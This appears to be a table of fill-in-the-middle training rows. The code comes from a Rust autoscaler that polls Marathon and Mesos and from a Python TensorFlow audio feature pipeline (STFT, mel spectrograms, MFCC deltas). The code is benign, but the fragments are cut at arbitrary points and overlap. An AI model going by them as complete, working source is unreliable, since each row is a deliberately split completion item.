file_name
large_stringlengths 4
140
| prefix
large_stringlengths 0
12.1k
| suffix
large_stringlengths 0
12k
| middle
large_stringlengths 0
7.51k
| fim_type
large_stringclasses 4
values |
---|---|---|---|---|
service.rs | _cpu_usage: f64,
pub max_instances: i64,
pub instances: i64,
pub tasks: HashMap<String, String>,
}
#[derive(Debug)]
pub struct Statistic {
pub timestamp: f64,
pub cpu_time: f64,
pub cpu_usage: f64,
pub mem_usage: f64,
}
#[derive(Debug, Deserialize)]
struct TaskStatistic {
cpus_limit: f64,
cpus_system_time_secs: f64,
cpus_user_time_secs: f64,
mem_limit_bytes: i64,
mem_rss_bytes: i64,
timestamp: f64,
}
pub struct | {
handle: Handle,
marathon_url: String,
mesos_url: String,
max_mem_usage: f64,
max_cpu_usage: f64,
multiplier: f64,
max_instances: i64,
}
impl Service {
pub fn new(handle: Handle, marathon_url: String, mesos_url: String,
max_mem_usage: f64, max_cpu_usage: f64,
multiplier: f64, max_instances: i64)
-> Service {
Service {
handle: handle,
marathon_url: marathon_url,
mesos_url: mesos_url,
max_mem_usage: max_mem_usage,
max_cpu_usage: max_cpu_usage,
multiplier: multiplier,
max_instances: max_instances,
}
}
pub fn get_apps(&mut self) -> Fut<Vec<String>> {
let url = format!("{}/v2/apps", &self.marathon_url);
self.send_get(&url).map(|body| {
let data = from_str::<Value>(&body).unwrap();
let data = data["apps"].as_array().unwrap();
let mut apps = Vec::new();
for x in data.iter() {
let id = x["id"].as_str().unwrap();
apps.push(id[1..].to_string());
}
apps
}).boxed()
}
pub fn get_app(&mut self, app: &str) -> Fut<Option<App>> {
let url = format!("{}/v2/apps/{}", &self.marathon_url, &app);
let app = app.to_string();
let mut max_instances = self.max_instances.clone();
let mut max_mem_usage = self.max_mem_usage.clone();
let mut max_cpu_usage = self.max_cpu_usage.clone();
self.send_get(&url).map(move |body| {
let data = from_str::<Value>(&body).unwrap();
let instances = data.pointer("/app/instances").unwrap();
let instances = instances.as_i64().unwrap();
let labels = data.pointer("/app/labels").unwrap();
let labels = labels.as_object().unwrap();
for (label, value) in labels {
match (label.as_ref(), value) {
("AUTOSCALE_MAX_INSTANCES", v) => {
max_instances = from_value(v.clone()).unwrap();
}
("AUTOSCALE_MEM_PERCENT", v) => {
max_mem_usage = from_value(v.clone()).unwrap();
}
("AUTOSCALE_CPU_PERCENT", v) => {
max_cpu_usage = from_value(v.clone()).unwrap();
}
_ => {}
}
}
let xs = data.pointer("/app/tasks").unwrap();
let xs = xs.as_array().unwrap();
let mut tasks = HashMap::new();
for x in xs.iter() {
let id = x["id"].as_str().unwrap();
let slave_id = x["slaveId"].as_str().unwrap();
tasks.insert(id.clone().to_string(),
slave_id.clone().to_string());
}
Some(App {
name: app,
max_instances: max_instances,
max_mem_usage: max_mem_usage,
max_cpu_usage: max_cpu_usage,
instances: instances,
tasks: tasks,
})
}).boxed()
}
pub fn get_slaves(&mut self) -> Fut<HashMap<String, String>> {
let url = format!("{}/master/slaves", &self.mesos_url);
self.send_get(&url).map(|body| {
let data = from_str::<Value>(&body).unwrap();
let data = data["slaves"].as_array().unwrap();
let mut slaves = HashMap::new();
for slave in data.iter() {
let id = slave["id"].as_str().unwrap();
let hostname = slave["hostname"].as_str().unwrap();
let port = slave["port"].as_i64().unwrap();
let addr = format!("{}:{}", hostname, port);
slaves.insert(id.clone().to_string(), addr.to_string());
}
slaves
}).boxed()
}
pub fn get_statistic(&mut self, app: &App,
slaves: &HashMap<String, String>,
prev: Option<&Statistic>)
-> Fut<Statistic> {
let mut futs = Vec::new();
for (id, slave_id) in &app.tasks {
let url = slaves.get::<String>(&slave_id).unwrap().to_string();
futs.push(self.get_task_statistic(url, id));
}
let mut prev_timestamp = 0.0;
let mut prev_cpu_time = 0.0;
if let Some(p) = prev {
prev_timestamp = p.timestamp;
prev_cpu_time = p.cpu_time;
}
futures::collect(futs).map(move |tasks| {
let mut mems: Vec<f64> = Vec::new();
let mut cpus: Vec<f64> = Vec::new();
let mut timestamp: f64 = 0.0;
for task in tasks {
if task.is_none() {
continue;
}
let task = task.unwrap();
timestamp = task.timestamp;
cpus.push(task.cpus_user_time_secs + task.cpus_system_time_secs);
mems.push(100.0 * task.mem_rss_bytes as f64 /
task.mem_limit_bytes as f64);
}
let mem_usage = mems.iter()
.fold(0.0, |a, &b| a + b) / mems.len() as f64;
let cpu_time = cpus.iter()
.fold(0.0, |a, &b| a + b) / cpus.len() as f64;
let sampling_duration = timestamp - prev_timestamp;
let cpu_time_usage = cpu_time - prev_cpu_time;
let cpu_usage = cpu_time_usage / sampling_duration * 100.0;
Statistic {
timestamp: timestamp,
cpu_time: cpu_time,
mem_usage: mem_usage,
cpu_usage: cpu_usage,
}
}).boxed()
}
pub fn scale(&mut self, app: &App) -> Fut<()> {
let instances = (app.instances as f64 * self.multiplier).ceil() as i64;
if instances > app.max_instances {
info!("Cannot scale {}, reached maximum instances of: {}",
app.name, app.max_instances);
return futures::done(Ok(())).boxed();
}
let url = format!("{}/v2/apps/{}", &self.marathon_url, &app.name);
let body = format!(r#"{{"instances": {}}}"#, instances);
let session = Session::new(self.handle.clone());
let mut req = Easy::new();
req.url(&url).unwrap();
req.put(true).unwrap();
let mut list = List::new();
list.append("Content-Type: application/json").unwrap();
req.http_headers(list).unwrap();
req.post_field_size(body.as_bytes().len() as u64).unwrap();
req.read_function(move |buf| {
let mut data = body.as_bytes();
Ok(data.read(buf).unwrap_or(0))
}).unwrap();
session.perform(req).map(|mut r| {
info!("Scaling response code: {}", r.response_code().unwrap());
}).boxed()
}
fn get_task_statistic(&mut self, slave: String, id: &str)
-> Fut<Option<TaskStatistic>> {
let url = format!("http://{}/monitor/statistics", &slave);
let id = id.to_string();
self.send_get(&url).map(move |body| {
let data = from_str::<Value>(&body).unwrap();
let data = data.as_array().unwrap();
data.iter().find(|x| {
x["executor_id"].as_str().unwrap() == id
}).map(|x| {
from_value(x["statistics"].clone()).unwrap()
})
}).boxed()
}
fn send_get(&mut self, url: &str) -> Fut<String> {
let session = Session::new(self.handle.clone());
let response = Arc::new(Mutex::new(Vec::new()));
let headers = Arc::new(Mutex::new(Vec::new()));
let mut req = Easy::new();
req.get(true).unwrap();
req.url(url).unwrap();
let response2 = response.clone();
req.write_function(move |data| {
response2.lock().unwrap().extend_from_slice(data);
Ok(data.len())
}).unwrap();
let headers2 = headers.clone();
req.header_function(move |header| {
headers2.lock().unwrap().push(header.to_vec());
true
}).unwrap();
session.perform(req).map(move |_| {
let response = response.lock().unwrap();
let response = String::from_utf8_lossy(&response);
response | Service | identifier_name |
service.rs | _usage: f64,
pub max_instances: i64,
pub instances: i64,
pub tasks: HashMap<String, String>,
}
#[derive(Debug)]
pub struct Statistic {
pub timestamp: f64,
pub cpu_time: f64,
pub cpu_usage: f64,
pub mem_usage: f64,
}
#[derive(Debug, Deserialize)]
struct TaskStatistic {
cpus_limit: f64,
cpus_system_time_secs: f64,
cpus_user_time_secs: f64,
mem_limit_bytes: i64,
mem_rss_bytes: i64,
timestamp: f64,
}
pub struct Service {
handle: Handle,
marathon_url: String,
mesos_url: String,
max_mem_usage: f64,
max_cpu_usage: f64,
multiplier: f64,
max_instances: i64,
}
impl Service {
pub fn new(handle: Handle, marathon_url: String, mesos_url: String,
max_mem_usage: f64, max_cpu_usage: f64,
multiplier: f64, max_instances: i64)
-> Service {
Service {
handle: handle,
marathon_url: marathon_url,
mesos_url: mesos_url,
max_mem_usage: max_mem_usage,
max_cpu_usage: max_cpu_usage,
multiplier: multiplier,
max_instances: max_instances,
}
}
pub fn get_apps(&mut self) -> Fut<Vec<String>> {
let url = format!("{}/v2/apps", &self.marathon_url);
self.send_get(&url).map(|body| {
let data = from_str::<Value>(&body).unwrap();
let data = data["apps"].as_array().unwrap();
let mut apps = Vec::new();
for x in data.iter() {
let id = x["id"].as_str().unwrap();
apps.push(id[1..].to_string());
}
apps
}).boxed()
}
pub fn get_app(&mut self, app: &str) -> Fut<Option<App>> {
let url = format!("{}/v2/apps/{}", &self.marathon_url, &app);
let app = app.to_string();
let mut max_instances = self.max_instances.clone();
let mut max_mem_usage = self.max_mem_usage.clone();
let mut max_cpu_usage = self.max_cpu_usage.clone();
self.send_get(&url).map(move |body| {
let data = from_str::<Value>(&body).unwrap();
let instances = data.pointer("/app/instances").unwrap();
let instances = instances.as_i64().unwrap();
let labels = data.pointer("/app/labels").unwrap();
let labels = labels.as_object().unwrap();
for (label, value) in labels {
match (label.as_ref(), value) {
("AUTOSCALE_MAX_INSTANCES", v) => |
("AUTOSCALE_MEM_PERCENT", v) => {
max_mem_usage = from_value(v.clone()).unwrap();
}
("AUTOSCALE_CPU_PERCENT", v) => {
max_cpu_usage = from_value(v.clone()).unwrap();
}
_ => {}
}
}
let xs = data.pointer("/app/tasks").unwrap();
let xs = xs.as_array().unwrap();
let mut tasks = HashMap::new();
for x in xs.iter() {
let id = x["id"].as_str().unwrap();
let slave_id = x["slaveId"].as_str().unwrap();
tasks.insert(id.clone().to_string(),
slave_id.clone().to_string());
}
Some(App {
name: app,
max_instances: max_instances,
max_mem_usage: max_mem_usage,
max_cpu_usage: max_cpu_usage,
instances: instances,
tasks: tasks,
})
}).boxed()
}
pub fn get_slaves(&mut self) -> Fut<HashMap<String, String>> {
let url = format!("{}/master/slaves", &self.mesos_url);
self.send_get(&url).map(|body| {
let data = from_str::<Value>(&body).unwrap();
let data = data["slaves"].as_array().unwrap();
let mut slaves = HashMap::new();
for slave in data.iter() {
let id = slave["id"].as_str().unwrap();
let hostname = slave["hostname"].as_str().unwrap();
let port = slave["port"].as_i64().unwrap();
let addr = format!("{}:{}", hostname, port);
slaves.insert(id.clone().to_string(), addr.to_string());
}
slaves
}).boxed()
}
pub fn get_statistic(&mut self, app: &App,
slaves: &HashMap<String, String>,
prev: Option<&Statistic>)
-> Fut<Statistic> {
let mut futs = Vec::new();
for (id, slave_id) in &app.tasks {
let url = slaves.get::<String>(&slave_id).unwrap().to_string();
futs.push(self.get_task_statistic(url, id));
}
let mut prev_timestamp = 0.0;
let mut prev_cpu_time = 0.0;
if let Some(p) = prev {
prev_timestamp = p.timestamp;
prev_cpu_time = p.cpu_time;
}
futures::collect(futs).map(move |tasks| {
let mut mems: Vec<f64> = Vec::new();
let mut cpus: Vec<f64> = Vec::new();
let mut timestamp: f64 = 0.0;
for task in tasks {
if task.is_none() {
continue;
}
let task = task.unwrap();
timestamp = task.timestamp;
cpus.push(task.cpus_user_time_secs + task.cpus_system_time_secs);
mems.push(100.0 * task.mem_rss_bytes as f64 /
task.mem_limit_bytes as f64);
}
let mem_usage = mems.iter()
.fold(0.0, |a, &b| a + b) / mems.len() as f64;
let cpu_time = cpus.iter()
.fold(0.0, |a, &b| a + b) / cpus.len() as f64;
let sampling_duration = timestamp - prev_timestamp;
let cpu_time_usage = cpu_time - prev_cpu_time;
let cpu_usage = cpu_time_usage / sampling_duration * 100.0;
Statistic {
timestamp: timestamp,
cpu_time: cpu_time,
mem_usage: mem_usage,
cpu_usage: cpu_usage,
}
}).boxed()
}
pub fn scale(&mut self, app: &App) -> Fut<()> {
let instances = (app.instances as f64 * self.multiplier).ceil() as i64;
if instances > app.max_instances {
info!("Cannot scale {}, reached maximum instances of: {}",
app.name, app.max_instances);
return futures::done(Ok(())).boxed();
}
let url = format!("{}/v2/apps/{}", &self.marathon_url, &app.name);
let body = format!(r#"{{"instances": {}}}"#, instances);
let session = Session::new(self.handle.clone());
let mut req = Easy::new();
req.url(&url).unwrap();
req.put(true).unwrap();
let mut list = List::new();
list.append("Content-Type: application/json").unwrap();
req.http_headers(list).unwrap();
req.post_field_size(body.as_bytes().len() as u64).unwrap();
req.read_function(move |buf| {
let mut data = body.as_bytes();
Ok(data.read(buf).unwrap_or(0))
}).unwrap();
session.perform(req).map(|mut r| {
info!("Scaling response code: {}", r.response_code().unwrap());
}).boxed()
}
fn get_task_statistic(&mut self, slave: String, id: &str)
-> Fut<Option<TaskStatistic>> {
let url = format!("http://{}/monitor/statistics", &slave);
let id = id.to_string();
self.send_get(&url).map(move |body| {
let data = from_str::<Value>(&body).unwrap();
let data = data.as_array().unwrap();
data.iter().find(|x| {
x["executor_id"].as_str().unwrap() == id
}).map(|x| {
from_value(x["statistics"].clone()).unwrap()
})
}).boxed()
}
fn send_get(&mut self, url: &str) -> Fut<String> {
let session = Session::new(self.handle.clone());
let response = Arc::new(Mutex::new(Vec::new()));
let headers = Arc::new(Mutex::new(Vec::new()));
let mut req = Easy::new();
req.get(true).unwrap();
req.url(url).unwrap();
let response2 = response.clone();
req.write_function(move |data| {
response2.lock().unwrap().extend_from_slice(data);
Ok(data.len())
}).unwrap();
let headers2 = headers.clone();
req.header_function(move |header| {
headers2.lock().unwrap().push(header.to_vec());
true
}).unwrap();
session.perform(req).map(move |_| {
let response = response.lock().unwrap();
let response = String::from_utf8_lossy(&response);
response | {
max_instances = from_value(v.clone()).unwrap();
} | conditional_block |
audio_processing.py | OTUNE
)
return tf.data.Dataset.zip((dataset, label_ds))
def get_stft(waveform, frame_length=512, frame_step=256):
# apply short-time Fourier transform
# splits signal into frames and applies Fourier transform on those
# by default uses smallest power of 2 enclosing frame_length for fft size
# uses hann window, an alternative would be hamming window
# https://www.tensorflow.org/api_docs/python/tf/signal/stft
return tf.signal.stft(
waveform,
frame_length=frame_length,
frame_step=frame_step,
window_fn=tf.signal.hann_window,
pad_end=True
)
def get_mel_spectrogram(
stft,
sample_rate,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False
):
# spectrograms need only magnitude from stft
# https://www.tensorflow.org/tutorials/audio/simple_audio#spectrogram
spectrogram = tf.abs(stft)
# the number of bins in the source spectrogram
# understood to be fft_size // 2 + 1
# // == floordiv
# https://www.tensorflow.org/api_docs/python/tf/signal/linear_to_mel_weight_matrix#args
num_spectrogram_bins = spectrogram.shape[-1]
# calculate a weight matrix that can be used to re-weight a spectrogram to mel-scale
linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(
num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,
upper_edge_hertz
)
# convert spectrogram to mel-scale
mel_spectrogram = tf.tensordot(spectrogram, linear_to_mel_weight_matrix, 1)
# print('mel spectrogram shape before: ', mel_spectrogram.shape)
# print('mel spectrogram shape before: ', mel_spectrogram.shape[:-1])
# # https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# # why is this needed?
# mel_spectrogram.set_shape(
# spectrogram.shape[:-1].concatenate(linear_to_mel_weight_matrix.shape[-1:]))
# print('mel spectrogram shape after: ', mel_spectrogram.shape)
if log:
# Compute a stabilized log to get log-magnitude mel-scale spectrograms.
mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)
if add_energy:
# Compute power spectrum of each frame
audio_power = tf.math.square(spectrogram)
# Compute total energy of each frame and collect them to a column vector
energy = tf.reshape(tf.reduce_sum(audio_power, 1), [audio_power.shape[0], 1])
mel_spectrogram = tf.concat([mel_spectrogram, energy], 1)
return mel_spectrogram
# http://practicalcryptography.com/miscellaneous/machine-learning/guide-mel-frequency-cepstral-coefficients-mfccs/#deltas-and-delta-deltas
# https://github.com/jameslyons/python_speech_features/blob/master/python_speech_features/base.py
# edited to work with tf.tensors
def delta(feat, N):
"""Compute delta features from a feature vector sequence.
:param feat: A tensor of shape (NUMFRAMES, features) containing features. Each row holds 1 feature vector.
:param N: For each frame, calculate delta features based on preceding and following N frames
:returns: A tensor of shape (NUMFRAMES, features) containing delta features. Each row holds 1 delta feature vector.
"""
if N < 1:
raise ValueError('N must be an integer >= 1')
NUMFRAMES = feat.shape[0]
denominator = 2 * sum([i**2 for i in range(1, N + 1)])
delta_feat = tf.reshape((), (0, feat.shape[1]))
padded = tf.pad(
feat, tf.constant([[N, N], [0, 0]]), 'CONSTANT', 0
) # padded version of feat
for t in range(NUMFRAMES):
delta_feat = tf.concat([
delta_feat,
tf.reshape(
tf.tensordot( | tf.range(-N, N + 1, 1, tf.float32), padded[t:t + 2 * N + 1], 1
) / denominator, (1, feat.shape[1])
)
], 0) # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]
return delta_feat
def get_mfcc(
log_mel_spectrogram,
num_mel_bins_to_pick=12,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
):
# If add_energy, assume that the last bin in log mel spectrograms represents energy and separate it
if (add_energy):
energy = tf.slice(
log_mel_spectrogram, [0, log_mel_spectrogram.shape[1] - 1],
[log_mel_spectrogram.shape[0], 1]
)
log_mel_spectrogram = tf.slice(
log_mel_spectrogram, [0, 0],
[log_mel_spectrogram.shape[0], log_mel_spectrogram.shape[1] - 1]
)
# https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# Compute MFCCs from log mel spectrograms
# Take num_mel_bins_to_pick bins
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel_spectrogram)[
..., :num_mel_bins_to_pick]
# add symmetric_zero_padding vectors of zeroes to both ends of the time dimension
if symmetric_zero_padding > 0:
zero_pad = tf.zeros([symmetric_zero_padding, num_mel_bins_to_pick])
mfcc = tf.concat([zero_pad, mfcc, zero_pad], 0)
# Add energy back if it was separated
if add_energy:
mfcc = tf.concat([mfcc, energy], 1)
if add_first_delta:
mfcc_delta = delta(mfcc, 1)
mfcc = tf.concat([mfcc, mfcc_delta], 1)
if add_second_delta:
mfcc_double_delta = delta(mfcc_delta, 1)
mfcc = tf.concat([mfcc, mfcc_double_delta], 1)
return mfcc
def load_audio(audio_file_path, sample_rate, clip_duration):
audio_binary = tf.io.read_file(audio_file_path)
# works only with 16bit wav files
# audio file is assumed to have sample rate equal to sample_rate
# scales to [-1.0, 1.0]
# takes clip_duration seconds of audio
# adds zero padding if clip is too short
tensor, _ = tf.audio.decode_wav(
audio_binary,
desired_channels=1,
desired_samples=int(sample_rate * clip_duration)
)
# remove last dimension, in this case the number of channels
return tf.squeeze(tensor, axis=-1)
def prepare_waveform_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = tf.data.Dataset.from_tensor_slices(file_paths)
waveform_ds = waveform_ds.map(
lambda file_path: load_audio(file_path, sample_rate, clip_duration),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
waveform_ds = waveform_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(waveform_ds, file_paths, labels_to_integers)
return waveform_ds
def prepare_mel_spectrogram_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = prepare_waveform_dataset(file_paths, sample_rate, clip_duration, False)
# apply short time fourier transform to each waveform
stft_ds = waveform_ds.map(
lambda waveform:
get_stft(waveform, frame_length=fft_frame_length, frame_step=fft_frame_step),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# get mel spectrograms
mel_spectrogram_ds = stft_ds.map(
lambda stft: get_mel_spectrogram(
stft, sample_rate, num_mel_bins, lower_edge_hertz, upper_edge_hertz, log,
add_energy
),
| random_line_split |
|
audio_processing.py | OTUNE
)
return tf.data.Dataset.zip((dataset, label_ds))
def get_stft(waveform, frame_length=512, frame_step=256):
# apply short-time Fourier transform
# splits signal into frames and applies Fourier transform on those
# by default uses smallest power of 2 enclosing frame_length for fft size
# uses hann window, an alternative would be hamming window
# https://www.tensorflow.org/api_docs/python/tf/signal/stft
return tf.signal.stft(
waveform,
frame_length=frame_length,
frame_step=frame_step,
window_fn=tf.signal.hann_window,
pad_end=True
)
def get_mel_spectrogram(
stft,
sample_rate,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False
):
# spectrograms need only magnitude from stft
# https://www.tensorflow.org/tutorials/audio/simple_audio#spectrogram
spectrogram = tf.abs(stft)
# the number of bins in the source spectrogram
# understood to be fft_size // 2 + 1
# // == floordiv
# https://www.tensorflow.org/api_docs/python/tf/signal/linear_to_mel_weight_matrix#args
num_spectrogram_bins = spectrogram.shape[-1]
# calculate a weight matrix that can be used to re-weight a spectrogram to mel-scale
linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(
num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,
upper_edge_hertz
)
# convert spectrogram to mel-scale
mel_spectrogram = tf.tensordot(spectrogram, linear_to_mel_weight_matrix, 1)
# print('mel spectrogram shape before: ', mel_spectrogram.shape)
# print('mel spectrogram shape before: ', mel_spectrogram.shape[:-1])
# # https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# # why is this needed?
# mel_spectrogram.set_shape(
# spectrogram.shape[:-1].concatenate(linear_to_mel_weight_matrix.shape[-1:]))
# print('mel spectrogram shape after: ', mel_spectrogram.shape)
if log:
# Compute a stabilized log to get log-magnitude mel-scale spectrograms.
mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)
if add_energy:
# Compute power spectrum of each frame
audio_power = tf.math.square(spectrogram)
# Compute total energy of each frame and collect them to a column vector
energy = tf.reshape(tf.reduce_sum(audio_power, 1), [audio_power.shape[0], 1])
mel_spectrogram = tf.concat([mel_spectrogram, energy], 1)
return mel_spectrogram
# http://practicalcryptography.com/miscellaneous/machine-learning/guide-mel-frequency-cepstral-coefficients-mfccs/#deltas-and-delta-deltas
# https://github.com/jameslyons/python_speech_features/blob/master/python_speech_features/base.py
# edited to work with tf.tensors
def delta(feat, N):
"""Compute delta features from a feature vector sequence.
:param feat: A tensor of shape (NUMFRAMES, features) containing features. Each row holds 1 feature vector.
:param N: For each frame, calculate delta features based on preceding and following N frames
:returns: A tensor of shape (NUMFRAMES, features) containing delta features. Each row holds 1 delta feature vector.
"""
if N < 1:
raise ValueError('N must be an integer >= 1')
NUMFRAMES = feat.shape[0]
denominator = 2 * sum([i**2 for i in range(1, N + 1)])
delta_feat = tf.reshape((), (0, feat.shape[1]))
padded = tf.pad(
feat, tf.constant([[N, N], [0, 0]]), 'CONSTANT', 0
) # padded version of feat
for t in range(NUMFRAMES):
delta_feat = tf.concat([
delta_feat,
tf.reshape(
tf.tensordot(
tf.range(-N, N + 1, 1, tf.float32), padded[t:t + 2 * N + 1], 1
) / denominator, (1, feat.shape[1])
)
], 0) # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]
return delta_feat
def get_mfcc(
log_mel_spectrogram,
num_mel_bins_to_pick=12,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
):
# If add_energy, assume that the last bin in log mel spectrograms represents energy and separate it
if (add_energy):
|
# https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# Compute MFCCs from log mel spectrograms
# Take num_mel_bins_to_pick bins
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel_spectrogram)[
..., :num_mel_bins_to_pick]
# add symmetric_zero_padding vectors of zeroes to both ends of the time dimension
if symmetric_zero_padding > 0:
zero_pad = tf.zeros([symmetric_zero_padding, num_mel_bins_to_pick])
mfcc = tf.concat([zero_pad, mfcc, zero_pad], 0)
# Add energy back if it was separated
if add_energy:
mfcc = tf.concat([mfcc, energy], 1)
if add_first_delta:
mfcc_delta = delta(mfcc, 1)
mfcc = tf.concat([mfcc, mfcc_delta], 1)
if add_second_delta:
mfcc_double_delta = delta(mfcc_delta, 1)
mfcc = tf.concat([mfcc, mfcc_double_delta], 1)
return mfcc
def load_audio(audio_file_path, sample_rate, clip_duration):
audio_binary = tf.io.read_file(audio_file_path)
# works only with 16bit wav files
# audio file is assumed to have sample rate equal to sample_rate
# scales to [-1.0, 1.0]
# takes clip_duration seconds of audio
# adds zero padding if clip is too short
tensor, _ = tf.audio.decode_wav(
audio_binary,
desired_channels=1,
desired_samples=int(sample_rate * clip_duration)
)
# remove last dimension, in this case the number of channels
return tf.squeeze(tensor, axis=-1)
def prepare_waveform_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = tf.data.Dataset.from_tensor_slices(file_paths)
waveform_ds = waveform_ds.map(
lambda file_path: load_audio(file_path, sample_rate, clip_duration),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
waveform_ds = waveform_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(waveform_ds, file_paths, labels_to_integers)
return waveform_ds
def prepare_mel_spectrogram_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = prepare_waveform_dataset(file_paths, sample_rate, clip_duration, False)
# apply short time fourier transform to each waveform
stft_ds = waveform_ds.map(
lambda waveform:
get_stft(waveform, frame_length=fft_frame_length, frame_step=fft_frame_step),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# get mel spectrograms
mel_spectrogram_ds = stft_ds.map(
lambda stft: get_mel_spectrogram(
stft, sample_rate, num_mel_bins, lower_edge_hertz, upper_edge_hertz, log,
add_energy
| energy = tf.slice(
log_mel_spectrogram, [0, log_mel_spectrogram.shape[1] - 1],
[log_mel_spectrogram.shape[0], 1]
)
log_mel_spectrogram = tf.slice(
log_mel_spectrogram, [0, 0],
[log_mel_spectrogram.shape[0], log_mel_spectrogram.shape[1] - 1]
) | conditional_block |
audio_processing.py | (file_path):
# each file's label is its directory's name
parts = tf.strings.split(file_path, os.path.sep)
return parts[-2]
def prepare_label_dataset(file_paths):
# create dataset by splitting input tensor to individual items
label_ds = tf.data.Dataset.from_tensor_slices(file_paths)
# extract labels from filepaths
# AUTOTUNE automatically optimizes data prefetching
return label_ds.map(get_label, num_parallel_calls=tf.data.experimental.AUTOTUNE)
def add_labels_to_dataset(dataset, file_paths, label_list=[]):
label_ds = prepare_label_dataset(file_paths)
if len(label_list) > 0:
label_ds = label_ds.map(
lambda label: tf.argmax(label == label_list),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return tf.data.Dataset.zip((dataset, label_ds))
def get_stft(waveform, frame_length=512, frame_step=256):
# apply short-time Fourier transform
# splits signal into frames and applies Fourier transform on those
# by default uses smallest power of 2 enclosing frame_length for fft size
# uses hann window, an alternative would be hamming window
# https://www.tensorflow.org/api_docs/python/tf/signal/stft
return tf.signal.stft(
waveform,
frame_length=frame_length,
frame_step=frame_step,
window_fn=tf.signal.hann_window,
pad_end=True
)
def get_mel_spectrogram(
stft,
sample_rate,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False
):
# spectrograms need only magnitude from stft
# https://www.tensorflow.org/tutorials/audio/simple_audio#spectrogram
spectrogram = tf.abs(stft)
# the number of bins in the source spectrogram
# understood to be fft_size // 2 + 1
# // == floordiv
# https://www.tensorflow.org/api_docs/python/tf/signal/linear_to_mel_weight_matrix#args
num_spectrogram_bins = spectrogram.shape[-1]
# calculate a weight matrix that can be used to re-weight a spectrogram to mel-scale
linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(
num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,
upper_edge_hertz
)
# convert spectrogram to mel-scale
mel_spectrogram = tf.tensordot(spectrogram, linear_to_mel_weight_matrix, 1)
# print('mel spectrogram shape before: ', mel_spectrogram.shape)
# print('mel spectrogram shape before: ', mel_spectrogram.shape[:-1])
# # https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# # why is this needed?
# mel_spectrogram.set_shape(
# spectrogram.shape[:-1].concatenate(linear_to_mel_weight_matrix.shape[-1:]))
# print('mel spectrogram shape after: ', mel_spectrogram.shape)
if log:
# Compute a stabilized log to get log-magnitude mel-scale spectrograms.
mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)
if add_energy:
# Compute power spectrum of each frame
audio_power = tf.math.square(spectrogram)
# Compute total energy of each frame and collect them to a column vector
energy = tf.reshape(tf.reduce_sum(audio_power, 1), [audio_power.shape[0], 1])
mel_spectrogram = tf.concat([mel_spectrogram, energy], 1)
return mel_spectrogram
# http://practicalcryptography.com/miscellaneous/machine-learning/guide-mel-frequency-cepstral-coefficients-mfccs/#deltas-and-delta-deltas
# https://github.com/jameslyons/python_speech_features/blob/master/python_speech_features/base.py
# edited to work with tf.tensors
def delta(feat, N):
"""Compute delta features from a feature vector sequence.
:param feat: A tensor of shape (NUMFRAMES, features) containing features. Each row holds 1 feature vector.
:param N: For each frame, calculate delta features based on preceding and following N frames
:returns: A tensor of shape (NUMFRAMES, features) containing delta features. Each row holds 1 delta feature vector.
"""
if N < 1:
raise ValueError('N must be an integer >= 1')
NUMFRAMES = feat.shape[0]
denominator = 2 * sum([i**2 for i in range(1, N + 1)])
delta_feat = tf.reshape((), (0, feat.shape[1]))
padded = tf.pad(
feat, tf.constant([[N, N], [0, 0]]), 'CONSTANT', 0
) # padded version of feat
for t in range(NUMFRAMES):
delta_feat = tf.concat([
delta_feat,
tf.reshape(
tf.tensordot(
tf.range(-N, N + 1, 1, tf.float32), padded[t:t + 2 * N + 1], 1
) / denominator, (1, feat.shape[1])
)
], 0) # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]
